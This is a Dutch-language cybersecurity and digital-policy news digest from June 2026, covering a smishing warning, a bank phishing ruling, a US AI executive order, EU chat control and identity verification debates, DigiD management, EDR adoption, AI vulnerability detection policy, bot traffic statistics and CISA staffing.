Een veelvoorkomende, maar verkeerde mindset bij bedrijven is de focus op 100 procent preventie van aanvallen, in plaats van op de detectie ervan. Aanvallers zullen altijd wel een manier vinden om binnen te komen. Eenmaal ze toegang hebben, begint het proces van bijvoorbeeld het verkrijgen van meer rechten. Deze activiteiten kunnen snel opvallen binnen systemen. Met goede tools en een alert security team kunnen aanvallen alsnog worden voorkomen en de impact beperkt blijven.

Voor kleine en middelgrote ondernemingen (kmo’s) of bedrijven met beperkte budgetten die hun cyberveiligheid willen testen, zijn pentesten een uitstekend startpunt. Deze bieden helderheid over de grootste security problemen en dienen als een concreet overzicht van risico’s. Nys stelt dat dergelijke tests, waarbij niet fysiek wordt ingebroken maar puur op technisch vlak naar security problemen wordt gezocht, al voor een beperkt aantal dagen kunnen worden uitgevoerd. De meeste klanten laten ongeveer jaarlijks een pentest uitvoeren. Dit is noodzakelijk gezien de voortdurende evolutie van security uitdagingen en de constante stroom van nieuwe kwetsbaarheden, om aanvallers voor te blijven.

 

Bron: ITDaily | Bron 2: newsroom.cisco.com

02 juni 2026 | EDRi waarschuwt voor surveillance en uitsluiting door digitalisering Brussel

De Europese digitale burgerrechtenbeweging EDRi slaat alarm over een omvangrijk digitaliseringsproject van de Europese Commissie en andere Europese instanties. Volgens EDRi schuilt achter de retoriek van efficiëntie, modernisering en burgerparticipatie een verontrustende realiteit die leidt tot surveillance, controle en uitsluiting, vooral van reeds gemarginaliseerde groepen. EDRi stelt dat dit geen louter technische upgrade van publieke dienstverlening is, maar een weloverwogen politieke keuze om individuele zorg en rechten op te offeren ten gunste van het normaliseren van toezicht en controle. De plannen hebben onder meer invloed op de werking van zorg- en sociale zekerheidssystemen.

De beweging merkt op dat de digitalisering van sociale zekerheid vaak fungeert als een Trojaans paard voor bezuinigingen, waarbij de Nederlandse Toeslagenaffaire als voorbeeld wordt aangehaald. Door een digitale interface tussen aanvrager en dienstverlener te plaatsen, kunnen staten zich volgens EDRi onttrekken aan hun verplichtingen. Het "sociaal vangnet" dreigt te veranderen in een "digitaal sleepnet", waarbij de gegevens van burgers worden verzameld en geanalyseerd via een bestuursarchitectuur die identiteitsvaststelling en vertrouwen van bovenaf herdefinieert, met als doel ontvangers met argwaan te benaderen.

EDRi benadrukt dat het niet om één enkel groot project gaat, maar om verschillende overlappende initiatieven, zoals de European Health Data Space (EHDS) en de portefeuille voor de Europese Digitale Identiteit. Een van de meest opvallende punten van het digitaliseringsplan is volgens de burgerrechtenbeweging de wankele juridische basis. EU-verdragen bepalen dat het aanbieden van publieke diensten, zoals gezondheidszorg, sociale zekerheid en onderwijs, primair een bevoegdheid van de lidstaten zelf is. De EU heeft geen mandaat om te dicteren hoe een burger in Roemenië toegang krijgt tot een arts, of hoe iemand in Portugal een werkloosheidsuitkering aanvraagt.

Om dit gebrek aan bevoegdheden te omzeilen, heeft de Europese Commissie 'soft law' en 'competence creep' toegepast. Hierbij wordt gesteld dat digitalisering deel uitmaakt van de 'interne markt' of 'grensoverschrijdende interoperabiliteit', met als doel data-uitwisseling tussen nationale systemen via digitalisering te vereenvoudigen. Op deze wijze heeft Brussel zich in het hart van het nationaal sociaal beleid weten te positioneren, aldus EDRi.

De burgerrechtenbeweging waarschuwt voor ingrijpende gevolgen voor de privacy van individuen. De verschuiving van 'lokale en analoge' interacties naar 'gecentraliseerde en digitale' zichtbaarheid betekent dat vitale diensten standaard digitaal worden en elk gebruik een 'datapunt' zal opleveren. De verzameling van deze datapunten kan een volledig inzicht in iemands leven geven, wat niet alleen kan leiden tot datalekken, maar ook tot vergaande profilering.

Een ander kritiekpunt van EDRi is dat dergelijke systemen vaak 'privacy by design' als een retorisch schild gebruiken. Privacy gaat volgens hen niet alleen over het vertrouwelijk houden van informatie, maar ook over het gebruik van infrastructuur om macht uit te oefenen. Zelfs als data versleuteld is, is de vereiste om een door de staat goedgekeurde digitale tool te gebruiken om een fundamenteel recht uit te oefenen, op zichzelf een vorm van surveillance. Dit creëert een 'knelpunt' waar de staat met een druk op de knop de toegang tot essentiële diensten kan uitschakelen.

EDRi concludeert met de waarschuwing dat Brussel de drang naar digitalisering vaak als onvermijdelijk presenteert. Dit is echter een politieke keuze die marktintegratie en administratieve controle boven fundamentele rechten en sociale inclusie plaatst. EDRi vreest dat dit uiteindelijk zal leiden tot een Europa waarin de staat niet langer een aanbieder van diensten is, maar een beheerder van digitale inloggegevens, en waar burgers niet langer rechten hebben, maar gebruikers zijn van wie de toegang kan verlopen.

 

Bron: EDRi | Bron 2: maps.app.goo.gl

02 juni 2026 | Fraudehelpdesk waarschuwt voor valse sms over onbetaalde schuld

De Fraudehelpdesk heeft recentelijk meldingen ontvangen over een nieuwe golf van valse sms-berichten die ontvangers proberen te misleiden met betrekking tot een vermeende onbetaalde schuld. Deze aanval met smishing is zorgvuldig opgezet en maakt gebruik van personalisatie om de geloofwaardigheid te vergroten. De aanhef van de sms-berichten vermeldt de volledige naam van de ontvanger, wat direct een gevoel van urgentie en authenticiteit creëert.

In de tekst van de valse sms wordt gesuggereerd dat de ontvanger een openstaande schuld heeft, ondanks eerdere aanmaningen die nooit zijn verstuurd of ontvangen. De afzenders dreigen met het inschakelen van een gerechtsdeurwaarder die beslag zal leggen op eigendommen indien de schuld niet onmiddellijk wordt voldaan. Om de ontvanger aan te zetten tot snelle actie, wordt een link in de sms aangeboden waarop geklikt moet worden om de betaling te regelen.

Wie op de kwaadaardige link klikt, komt terecht op een zorgvuldig nagemaakte webpagina die de huisstijl van de Belastingdienst imiteert. Deze valse website is voorzien van een chatbox, waar slachtoffers naar verluidt een betaallink kunnen aanvragen. Dit proces is bedoeld om de slachtoffers verder te leiden en hen te verleiden tot het overmaken van geld aan de oplichters.

De Fraudehelpdesk benadrukt met klem dat deze sms-berichten en de bijbehorende website volledig vals zijn. Er wordt dan ook dringend geadviseerd om niet op de link in de sms te klikken, geen betaallink aan te vragen via de chatbox op de nepwebsite en in geen geval geld over te maken. Bij twijfel over de echtheid van een bericht van de Belastingdienst, adviseert de Fraudehelpdesk om altijd zelf direct contact op te nemen met de Belastingdienst via de officiële kanalen om de authenticiteit na te vragen.

Ontvangers die een dergelijke sms hebben ontvangen, worden aangemoedigd om dit te melden bij de Fraudehelpdesk. Indien men toch op de link heeft geklikt en geld heeft overgemaakt, is het raadzaam om zo snel mogelijk contact op te nemen met de Fraudehelpdesk voor persoonlijk advies en verdere stappen.

 

Bron: Fraudehelpdesk

03 juni 2026 | Baanbrekend vonnis: bank moet phishing slachtoffers terugbetalen

De ondernemingsrechtbank in Antwerpen heeft een baanbrekend vonnis uitgesproken in een phishingzaak, waarbij een bank is veroordeeld tot onmiddellijke terugbetaling van 49.958 euro aan een bejaard echtpaar. Het echtpaar, 90 en 93 jaar oud, verloor het bedrag nadat ze slachtoffer waren geworden van een valse bankmedewerker. De bank weigerde aanvankelijk de schade te vergoeden, maar is nu in kort geding gedwongen tot terugbetaling.

Phishingspecialist en advocaat Geert Lenssens noemt de uitspraak "baanbrekend". Volgens Lenssens doen banken er vaak alles aan om niet te hoeven betalen in dergelijke zaken, maar dit vonnis schept een precedent. Het is een belangrijke ontwikkeling voor slachtoffers van phishing, die nu mogelijk meer kans hebben om hun verloren geld via de rechter terug te vorderen. De details van de uitspraak zijn bekend geworden via een beschikking die door HLN is ingekeken. Dit vonnis kan significante gevolgen hebben voor de manier waarop banken in België en mogelijk ook Nederland omgaan met de terugbetaling van bedragen die door cybercriminaliteit, zoals phishing, zijn ontvreemd. Het benadrukt de verantwoordelijkheid van financiële instellingen om hun klanten te beschermen tegen online fraude.

 

Bron: HLN

03 juni 2026 | Witte Huis presenteert aangescherpte AI-executieve order voor innovatie en cybersecurity

Het Witte Huis heeft dinsdag een langverwachte uitvoerende order over kunstmatige intelligentie (AI) bekendgemaakt. Deze herziene versie, die volgt op een eerder concept dat vorige maand werd verworpen na interne onenigheid, richt zich op het bevorderen van innovatie op het gebied van AI en de beveiliging hiervan. Een belangrijke wijziging ten opzichte van de vorige versie is de aanpassing van de vrijwillige beoordelingsperiode voor overheidstesten van AI modellen: deze is nu gesteld op 30 dagen na publieke release, in plaats van de eerder voorgestelde 90 dagen. Rapporten suggereerden dat leiders uit de AI-industrie aandrongen op een beoordelingstermijn van 14 dagen.

De order benadrukt dat federale toegang tot AI modellen onderworpen moet zijn aan "passende vertrouwelijkheid, cybersecurity, bescherming tegen risico's door insiders en vereisten voor intellectueel eigendom, gebruik en geheimhouding". De industrie wordt opgeroepen om samen te werken met de overheid om "vertrouwde partners" te selecteren. Deze partners zouden toegang krijgen tot speciaal aangewezen "covered frontier" modellen om de cybersecurity van kritieke infrastructuur te versterken en cyberdreigingen in een geclassificeerde omgeving te volgen. Ontwikkelaars van AI moeten met de overheid bepalen welke modellen worden aangewezen en welke partners worden ingeschakeld.

De uitvoerende order stelt expliciet dat het vrijwillige kader niet moet worden gezien als een autorisatie voor de "creatie van een verplichte overheidslicentie, voorafgaande goedkeuring of vergunningsvereiste voor de ontwikkeling, publicatie, release of distributie van nieuwe AI modellen, inclusief frontier modellen".

Daarnaast mandateert de order dat functionarissen van de uitvoerende macht, onder leiding van het ministerie van Financiën, een "AI cybersecurity clearinghouse" opzetten. Dit clearinghouse moet de samenwerking tussen overheid, industrie en beheerders van kritieke infrastructuur vergemakkelijken. Het ministerie van Financiën wordt ook opgedragen om kwetsbaarheden, geïdentificeerd door AI modellen, te scannen en de prioriteit voor patching te bepalen. Verder moeten het Office of the National Cyber Director, de Cybersecurity and Infrastructure Security Agency (CISA) en het Office of Management and Budget federale subsidiefondsen lokaliseren die kunnen worden gebruikt voor geavanceerde detectie van kwetsbaarheden in AI.

De order werd achter gesloten deuren ondertekend, nadat een publieke ondertekening van de vorige versie op het laatste moment werd geannuleerd als gevolg van interne conflicten. Deze conflicten ontstonden tussen sommige overheidsfunctionarissen en voormalig AI- en crypto-adviseur David Sacks, die de president informeerde over zorgen vanuit de industrie dat de bepalingen innovatie en concurrentie met China zouden schaden. De president gaf toen aan "bepaalde aspecten" van de order niet te waarderen, daarbij verwijzend naar de dreiging die uitgaat van China.

De regering heeft zich grotendeels gericht op een AI-strategie die de nadruk legt op deregulering. Deze aanpak is echter de afgelopen weken ter discussie gesteld, aangezien nieuwe modellen zoals Anthropic’s Mythos zijn opgedoken als aanzienlijke cybersecuritydreigingen, in staat om autonoom zero-day kwetsbaarheden te ontdekken en te misbruiken. Senator Mark Warner (D-VA), voorzitter van de Senaatscommissie voor Inlichtingen, sprak zijn steun uit voor de bepalingen in de uitvoerende order. Hoewel hij de maatregelen prees als noodzakelijke hervormingen, bekritiseerde hij de regering ook voor het intrekken van een eerdere AI-uitvoerende order van de Biden-administratie die vergelijkbare doelen had.

 

Bron: White House | Bron 2: politico.com | Bron 3: recordedfuture.com

03 juni 2026 | Mullvad vreest einde vrij internet door identiteitsverificatie

Vpn-provider Mullvad waarschuwt dat de introductie van leeftijds- of identiteitsverificatie op het internet kan leiden tot het einde van een vrij en anoniem digitaal landschap. Het bedrijf uit zijn zorgen in een uitgebreid betoog en vergelijkt de mogelijke toekomst met de dystopie van George Orwell's '1984', waarin staatsgecontroleerde apparaten en informatie de norm zijn.

Steeds meer landen, waaronder het Verenigd Koninkrijk en de Verenigde Staten, overwegen de invoering van leeftijdsverificatie voor sociale media en andere websites. Er zijn zelfs discussies over het verplicht stellen van dergelijke verificatie voor vpn-providers. Mullvad stelt dat 'leeftijdsverificatie' in de praktijk neerkomt op 'identiteitsverificatie', aangezien gebruikers zich moeten identificeren bij de diensten die ze willen gebruiken, of bij een derde partij die hun identiteit aan hun online activiteiten kan koppelen. De vpn-provider vreest dat deze informatie via commerciële overeenkomsten of met overheden zal worden gedeeld, wat de vrijheid van informatie ernstig zou beperken.

De gevolgen hiervan zijn volgens Mullvad aanzienlijk: gebruikers zouden niet langer anoniem gereguleerde websites kunnen bezoeken of anoniem kunnen reageren op sociale media. Dit kan leiden tot angst om kritiek te uiten op overheden, met potentieel ernstige consequenties afhankelijk van het land waar men woont.

Sommige landen overwegen identiteitsverificatie direct in te bouwen op het niveau van systemen, appstores of besturingssystemen. Mullvad merkt op dat gebruikers in dergelijke gevallen nog zouden kunnen uitwijken naar opensourcesystemen, die door hun open en aanpasbare aard niet volledig door autoriteiten te besturen zijn. Echter, om volledige controle te verkrijgen, zouden overheden uiteindelijk apparaten moeten verbieden die niet door de staat worden gecontroleerd, wat de weg opent naar een 'telescreen'-achtige situatie zoals in '1984'.

Eerder dit jaar introduceerde de Europese Commissie een app voor leeftijdsverificatie, die volgens hen 'volledig anoniem' zou zijn. Mullvad betwist deze claim. Gebruikers moeten hun identiteit bij een derde partij (zoals EU-lidstaten) verifiëren met een identiteitsbewijs. Deze partij verstrekt vervolgens een credential aan het sociale mediaplatform. Hoewel het platform de leeftijd kan zien, weet de derde partij welke credentials bij welke persoon horen. Dit maakt het volgens Mullvad eenvoudig voor autoriteiten om, bij onwelgevallige content, de credential bij het platform op te vragen en zo de persoon te identificeren.

Een mogelijke oplossing hiervoor is Zero-Knowledge Proof (ZKP) cryptografie, waarbij de derde partij de credentials niet kan koppelen aan gebruikersaccounts op platforms. De huidige Europese app voor leeftijdsverificatie ondersteunt deze functionaliteit niet en mocht dit in de toekomst wel het geval zijn, dan zou het een optionele feature zijn die landen kunnen uitschakelen of de EU kan verwijderen, aldus Mullvad.

De vpn-provider concludeert dat de "veiligheid" van kinderen al geruime tijd wordt misbruikt als argument door inlichtingendiensten en autoriteiten om massasurveillance te rechtvaardigen. Mullvad roept politici op de haast waarmee leeftijdsverificatie wordt ingevoerd af te remmen en de verregaande gevolgen voor de burgerlijke vrijheden te overwegen.

 

Bron: youtu.be

03 juni 2026 | Cyprus werkt aan nieuw compromisvoorstel voor EU-chatcontrole

Cyprus, de huidige voorzitter van de Europese Unie, bereidt een nieuw compromisvoorstel voor met betrekking tot de omstreden chatcontroleregelgeving. Dit voorstel zal naar verwachting binnenkort worden gepresenteerd aan de Europese Commissie, de Raad en het Europees Parlement. Minister Van Weel van Justitie en Veiligheid heeft de Tweede Kamer hierover geïnformeerd in een recente brief. Het Cypriotische voorzitterschap heeft als doelstelling om deze maand tot een Europees akkoord over chatcontrole te komen.

Eind vorig jaar stemden de lidstaten van de EU al in met een Deens voorstel voor chatcontrole. Dit voorstel voorziet erin dat technologiebedrijven op vrijwillige basis permanent het verkeer van gebruikers, waaronder chatberichten, controleren. De mogelijkheid bestaat echter dat deze controle in de toekomst verplicht wordt gesteld. Bovendien omvat het Deense voorstel ook een verplichte online leeftijdsverificatie. Hoewel voorstanders benadrukken dat de uitvoering van chatcontrole vrijwillig blijft, bevat het voorstel een clausule voor herziening.

Deze clausule stelt dat binnen drie jaar de noodzaak en haalbaarheid van het opnemen van detectieverplichtingen in het toepassingsgebied van de verordening zal worden onderzocht. Voormalig minister van Justitie en Veiligheid Van Oosten had vorig jaar al gewezen op de aanwezigheid van deze clausule. Momenteel zijn de Europese Commissie, de Raad en het Europees Parlement in onderhandeling over de exacte inhoud van de verordening.

Minister Van Weel heeft aangegeven dat het kabinet zich zal buigen over het aanstaande compromisvoorstel van Cyprus. Naar aanleiding van vragen van het CDA over de positie van de minister ten aanzien van zogenaamde detectiebevelen, liet Van Weel weten dat hierover nog niet is gesproken in de onderhandelingen. De Europese Commissie heeft de wens geuit om diensten te kunnen verplichten al het verkeer van hun gebruikers te controleren, inclusief chatberichten.

Patrick Breyer, voormalig Europarlementariër en uitgesproken criticus van chatcontrole, stelt dat de definitieve inhoud van de regelgeving voor chatcontrole 2.0 momenteel in een trialoog wordt besproken. Breyer waarschuwt voor de mogelijke gevolgen, waaronder permanente en willekeurige massale surveillance van berichten en chats naar eigen inzicht van providers. Hij vreest tevens voor ineffectieve netwerkblokkering, verplichte verificatie van leeftijd die het einde van anonieme communicatie betekent, censuur in appstores en de uitsluiting van minderjarigen uit de digitale wereld. Vpn-dienst Mullvad heeft eveneens zijn bezorgdheid geuit, stellende dat verificatie van identiteit het einde van het vrije internet zou kunnen betekenen.

 

Bron: Tweede Kamer

03 juni 2026 | Overdracht beheer van DigiD na verbod op overname Solvinity duurt 6 tot 12 maanden

De overdracht van het beheer van DigiD, dat momenteel door Solvinity wordt geleverd, zal zes tot twaalf maanden in beslag nemen wanneer het ondergebracht wordt bij een andere partij. Dit heeft staatssecretaris Van der Burg van Binnenlandse Zaken verklaard. De bewindsman reageerde hiermee op Kamervragen van het Kamerlid van JA21 over de veiligheidsrisico's, juridische reikwijdte en afhankelijkheden rond DigiD, Solvinity en Kyndryl. Recentelijk werd de beoogde overname van Solvinity door het Amerikaanse Kyndryl door staatssecretaris Aerdts voor Digitale Economie verboden.

Van der Burg legde uit dat ondernemingen die onder de Amerikaanse rechtsmacht vallen, op grond van de CLOUD Act verplicht kunnen worden om gegevens te verstrekken. Dit geldt ook wanneer deze gegevens zich op servers buiten de Verenigde Staten bevinden. Cruciaal hierbij is of de onderneming "possession, custody or control" heeft over de gegevens. Deze wetgeving is onder meer van toepassing op aanbieders van elektronische communicatie- en clouddiensten.

Kyndryl Inc. is een Amerikaanse onderneming en valt daarmee binnen het bereik van deze en andere Amerikaanse wetten. De zeggenschap van de VS over haar buitenlandse dochters, waaronder Kyndryl Nederland B.V. en eventueel overgenomen partijen, heeft tot gevolg dat ook zij binnen het bereik van de genoemde wetten vallen.

Met betrekking tot de toegang tot gegevens van gebruikers van DigiD, antwoordde Van der Burg dat medewerkers van Solvinity bij reguliere beheerwerkzaamheden in beginsel geen toegang hebben tot de database waarin burgerservicenummers, adressen, telefoonnummers en inloggegevens van burgers zijn opgeslagen. Hij erkende echter dat dit niet uitsluit dat medewerkers toegang tot deze databases kunnen verkrijgen, waarbij het dan gaat om (on)geautoriseerde toegang, wat mogelijk strafbaar is.

Op de vraag naar Nederlandse of Europese alternatieven gaf de staatssecretaris aan dat het kabinet van mening is dat er momenteel gelijkwaardige technologieën van Nederlandse en Europese aanbieders beschikbaar zijn. Hij verwees naar onderzoek van de Autoriteit Consument en Markt (ACM) waaruit bleek dat er na een eventuele overname van Solvinity voldoende concurrentie zou overblijven. Een versnelde overdracht van de dienstverlening van Solvinity aan een andere partij kan echter risico's met zich meebrengen.

Volgens Logius geldt voor het beheer van DigiD een overdrachtsperiode van zes tot twaalf maanden wanneer het beheer van DigiD, geleverd door Solvinity, wordt ondergebracht bij een andere beheerorganisatie. Deze periode is noodzakelijk om een nieuwe organisatie voldoende kennis en ervaring te laten opdoen met het beheer van het platform, om zo de continuïteit en veiligheid van DigiD en andere voorzieningen te waarborgen. Deze overdrachtsperiode kan echter pas ingaan wanneer een nieuwe partij is geworven. Het kabinet heeft recent besloten het contract voor het beheer van DigiD door Solvinity met twee jaar te verlengen.

 

Bron: Tweede Kamer

03 juni 2026 | Organisaties worstelen met operationalisering EDR te midden van AI-gestuurde aanvallen

Veel organisaties erkennen dat endpointbeveiliging op zichzelf niet langer voldoende is, wat heeft geleid tot een snelle adoptie van endpointdetectie en -respons (EDR) systemen. Het in bezit hebben van EDR-mogelijkheden vertaalt zich echter niet automatisch in operationele cyberweerbaarheid. Met name middelgrote organisaties, ondanks investeringen in geavanceerde endpointbeveiligingsplatforms, ondervinden vaak moeilijkheden bij het volledig operationaliseren van deze capaciteiten.

Slanke beveiligingsteams worden overweldigd door de grote hoeveelheid alerts, onderzoeken duren te lang en de responsmogelijkheden zijn beperkt. Moderne aanvallen bewegen sneller, omzeilen traditionele preventiemaatregelen en vereisen continue zichtbaarheid van verdachte activiteiten. Terwijl dreigingen sneller worden, vaker door AI worden ondersteund en in toenemende mate legitieme tools misbruiken om detectie te omzeilen, wordt duidelijk dat zichtbaarheid alleen niet meer volstaat. Organisaties die voorop lopen, zetten niet alleen meer detectiemogelijkheden in, maar reduceren proactief de aanvalskansen en operationaliseren de respons op een duurzame manier voor teams met beperkte middelen.

De uitdagingen bij het operationaliseren van EDR omvatten te veel alerts, onvoldoende onderzoekscapaciteit, beperkte tijd voor continue monitoring, tekorten aan vaardigheden (vooral op het gebied van dreigingsopsporing en geavanceerde respons), operationele vermoeidheid door reactieve workflows en moeite met het prioriteren van daadwerkelijk gevaarlijke activiteiten. Dit creëert een kloof tussen beveiligingscapaciteit en daadwerkelijke beveiligingsresultaten.

Door AI ondersteunde aanvallen vergroten de operationele druk op reeds overbelaste teams. Volgens het Cybersecurity Assessment Report van 2025 meldde 67% van de organisaties een toename van door AI aangedreven aanvallen. Dit betekent dat tegen de tijd dat kleinere teams alerts onderzoeken, aanvallers mogelijk al privileges hebben geëscaleerd, lateraal zijn verplaatst of persistentie hebben gevestigd. Detectie blijft essentieel, maar kan overmatige blootstelling, reactieve workflows en vertraagde respons niet compenseren. Dit geldt des te meer omdat aanvallers niet langer uitsluitend vertrouwen op malware of luidruchtige intrusietechnieken. In plaats daarvan misbruiken ze steeds vaker legitieme administratieve tools, gestolen inloggegevens en vertrouwde processen om onopgemerkt te blijven. Onderzoek van Bitdefender, waarbij meer dan 700.000 cyberincidenten werden geanalyseerd, toonde aan dat 84% van de grote aanvallen nu gebruikmaakt van living-off-the-land (LOTL) technieken.

Als antwoord op deze uitdagingen worden complementaire benaderingen zoals dynamische hardening en Managed Detection and Response (MDR) naar voren geschoven. Dynamische hardening, bijvoorbeeld via Bitdefender GravityZone PHASR, werkt door exploiteerbare omstandigheden dynamisch te verminderen voordat aanvallers hiervan kunnen profiteren. Dit gebeurt door AI te gebruiken om zich aan te passen aan gebruikersgedrag en risicovolle acties, onnodige privileges en het misbruik van legitieme tools te beperken, zonder de productiviteit te verstoren. MDR, zoals Bitdefender MDR, vult interne beveiligingsteams aan met 24/7 monitoring, dreigingsopsporing, onderzoek en snelle respons door ervaren beveiligingsprofessionals. Deze gelaagde aanpak, bestaande uit proactieve hardening, EDR-zichtbaarheid en MDR voor continue respons, stelt organisaties in staat hun beveiligingshouding aanzienlijk te versterken en tegelijkertijd de operationele complexiteit te verminderen.

Organisaties die hun bestaande EDR-investering operationaliseren met proactieve hardening en MDR, realiseren meetbare beveiligings- en bedrijfsresultaten. Dit omvat een verminderd risico op technieken die in 84% van de ernstige aanvallen worden gebruikt, snellere detectie en indamming van dreigingen, verminderde operationele last en alertmoeheid voor teams, en een groter rendement op bestaande EDR-investeringen. Het resultaat is een veerkrachtiger en duurzamer beveiligingsmodel.

 

Bron: The Hacker News

03 juni 2026 | Kabinet waarschuwt voor risico's bij gebruik van AI modellen voor kwetsbaarheidsdetectie

Het Nederlandse kabinet roept op tot voorzichtigheid bij het gebruik van modellen met artificiële intelligentie (AI), zoals Mythos, voor het opsporen van kwetsbaarheden. Minister Van Weel van Justitie en Veiligheid heeft dit standpunt kenbaar gemaakt in reactie op Kamervragen van D66 en GroenLinks-PvdA. De vragen volgden op berichtgeving over Mythos, een AI model ontwikkeld door Anthropic, dat naar eigen zeggen al meer dan tienduizend kwetsbaarheden heeft ontdekt.

Kamerleden El Boujdaini (D66) en Kathmann (GroenLinks-PvdA) wilden weten of overheden toegang zouden moeten krijgen tot dergelijke AI modellen om preventief kwetsbaarheden op te sporen en te dichten, en of dit veilig en verantwoord mogelijk is. De minister bepleit terughoudendheid ten aanzien van het operationele gebruik van een leveranciersmodel dat niet Europees is, als oplossing voor preventieve kwetsbaarheidsdetectie.

Volgens de bewindsman blijkt uit onderzoek dat toegang tot zogeheten AI-frontiermodellen in veel gevallen niet essentieel is voor effectieve detectie van kwetsbaarheden. Het verschil tussen frontiermodellen en minder geavanceerde modellen zou mogelijk minder groot zijn dan de berichtgeving rondom grote modelaankondigingen suggereert. Een ander punt van zorg is dat de aanbieders van AI modellen, zoals Anthropic met Mythos, de toegang en voorwaarden bepalen. Toegang onder deze voorwaarden zou de afhankelijkheid van Amerikaanse partijen vergroten.

Minister Van Weel benadrukt verder dat preventieve kwetsbaarheidsdetectie via AI veilig en verantwoord kan worden ingericht, mits dit losgekoppeld is van één specifieke leverancier. De noodzaak van toegang is afhankelijk van specifieke omstandigheden, voorwaarden en afhankelijkheden, en vereist telkens een brede afweging. Er wordt ook op gewezen dat geavanceerde AI modellen vooralsnog afkomstig zijn van commerciële bedrijven, veelal uit niet-Europese landen waar andere wet- en regelgeving geldt dan in de Europese Unie.

Dit kan ertoe leiden dat er weinig tot geen inzicht bestaat in de onderliggende systemen en software van dergelijke systemen, en dat deze systemen niet voldoen aan de Europese wet- en regelgeving. Het verder integreren van modellen met AI in Nederlandse digitale kernprocessen, waarbij de AI modellen draaien op infrastructuur van niet-Europese aanbieders, kan leiden tot een toenemende afhankelijkheid. De minister waarschuwt dat veel geavanceerde modellen met AI op niet-Europese cloudinfrastructuur draaien. Een dergelijke integratie vergroot de afhankelijkheid van niet-Europese aanbieders, met bijbehorende risico’s op het gebied van data soevereiniteit, continuïteit, vertrouwelijkheid en strategische afhankelijkheid.

 

Bron: Ministerie van Justitie en Veiligheid | Bron 2: tweedekamer.nl

04 juni 2026 | Bots overtreffen mensen in wereldwijd webverkeer, met gevolgen voor cybersecurity

Voor het eerst in de geschiedenis van het internet hebben geautomatiseerde bots officieel menselijke gebruikers overtroffen in het wereldwijde webverkeer. Deze verschuiving voltrekt zich sneller dan zelfs experts hadden voorspeld. Volgens gegevens van Cloudflare Radar zijn bots nu verantwoordelijk voor 57,5% van alle HTTP-verzoeken naar HTML-pagina's wereldwijd, terwijl menselijk gegenereerd verkeer is gedaald tot slechts 42,5%. In de Verenigde Staten is dit beeld nog extremer, met botverkeer dat een aandeel van 71,5% van de binnenlandse webverzoeken opeist, wat de diepgang van AI-gedreven automatisering in de meest verbonden markten van de wereld benadrukt.

Deze trend wordt bevestigd door onafhankelijke bronnen. Het 2025 Imperva Bad Bot Report stelde vast dat geautomatiseerd verkeer voor het eerst in tien jaar de drempel van 50% overschreed, en in 2024 51% van al het wereldwijde webverkeer bereikte. Het netwerk van Cloudflare zelf, dat ongeveer één op de vijf websites wereldwijd bedient, toonde eind 2025 een verhouding van ongeveer 53% botverkeer tegenover 47% menselijk verkeer op HTML-verzoeken. Matthew Prince, CEO van Cloudflare, had eerder dit jaar op SXSW voorspeld dat botverkeer pas tegen 2027 menselijk verkeer zou overtreffen, een voorspelling die nu eerder dan verwacht is uitgekomen.

Prince benadrukt het aanzienlijke verschil in browsegedrag tussen mensen en AI. Waar een mens die naar een product zoekt misschien vijf websites bezoekt, kan een AI-agent voor dezelfde taak wel 5.000 sites bevragen. Dit patroon wordt voornamelijk gedreven door AI-scrapers, crawlers voor het trainen van grote taalmodellen (LLM's) en autonome zoekagenten die zijn gebouwd op modellen zoals OpenAI’s GPT, Anthropic’s Claude en Google’s Gemini. Het AI-gedreven verkeer nam in 2025 specifiek met 187% toe, een groei die bijna acht keer sneller was dan de menselijke webactiviteit in dezelfde periode.

De toename van botverkeer heeft ernstige beveiligingsimplicaties. Van al het geautomatiseerde verkeer wordt 37% geclassificeerd als kwaadaardig, de zogenaamde "bad bots", terwijl slechts 14% legitieme crawlers zijn. Uitgevers en adverteerders kampen nu met fundamenteel vertekende analyses, aangezien verkeersdashboards machinegedrag weerspiegelen in plaats van echte gebruikersbetrokkenheid. Als reactie hierop winnen nieuwe kaders, zoals 'pay-to-crawl'-protocollen, terrein. Cloudflare is al overgegaan tot het standaard blokkeren van AI-crawlers, tenzij zij contentmakers compenseren. Naarmate autonome agenten, AI-gestuurde zoekhulpmiddelen en LLM-pijplijnen zich verder verspreiden, zal de verhouding naar automatisering verder doorslaan. De 'agent economy' is geen voorspelling meer voor 2027; het is de huidige realiteit van het internet, en de infrastructuur, verdienmodellen en beveiligingsarchitecturen van het web zullen zich dienovereenkomstig moeten aanpassen.

 

Bron: Cloudflare

04 juni 2026 | DHS-chef Mullin signaleert herstructurering CISA na budget- en personeelsbezuinigingen

De Amerikaanse minister van Binnenlandse Veiligheid, Markwayne Mullin, heeft woensdag aangegeven dat hij het toonaangevende civiele cyberbeveiligingsagentschap van de overheid, de Cybersecurity and Infrastructure Security Agency (CISA), nieuw leven wil inblazen. CISA is de afgelopen periode een frequent doelwit geweest van kritiek vanuit de regering.

Tijdens de tweede regering-Trump heeft CISA ongeveer een derde van zijn personeelsbestand verloren en is het budget van 3 miljard dollar drastisch verlaagd. Dit volgde op jarenlange klachten van Republikeinen dat de inspanningen van het agentschap om online desinformatie tijdens verkiezingen te bestrijden, conservatieve stemmen viseerden en inbreuk maakten op het recht op vrije meningsuiting. Het begrotingsvoorstel van president Trump voor fiscaal 2027 zou nog eens ruim 700 miljoen dollar van het agentschap afsnoeien, wat tot tweeledige bezorgdheid in het Congres heeft geleid.

Andrew Garbarino (R-NY), voorzitter van de Huiscommissie voor Binnenlandse Veiligheid, merkte tijdens een hoorzitting op dat CISA de afgelopen achttien maanden een aanzienlijke vermindering van het totale personeelsbestand heeft gezien, inclusief vrijwillige vertrekken, gedwongen ontslagen en herplaatsingen van personeel voor cyberbeveiliging. Hij uitte zijn zorgen dat enkele voorstellen in het begrotingsverzoek, zoals bezuinigingen op personeel en onderwijsprogramma's voor cyberbeveiliging die essentieel zijn voor het opleiden van geschoolde professionals in de Verenigde Staten, een negatief effect kunnen hebben op de inspanningen.

In zijn eerste optreden voor de commissie sinds zijn bevestiging in maart, stelde Mullin dat CISA waarschijnlijk ongeveer 2.800 werknemers nodig heeft, hoewel het de capaciteit heeft om tot 3.400 mensen in dienst te nemen. Momenteel heeft CISA ongeveer 2.200 personeelsleden. Mullin benadrukte de urgentie: "We zullen niet falen in de missie die voor ons ligt. Cyberaanvallen worden alleen maar sterker en richten zich het meest op onze private partners."

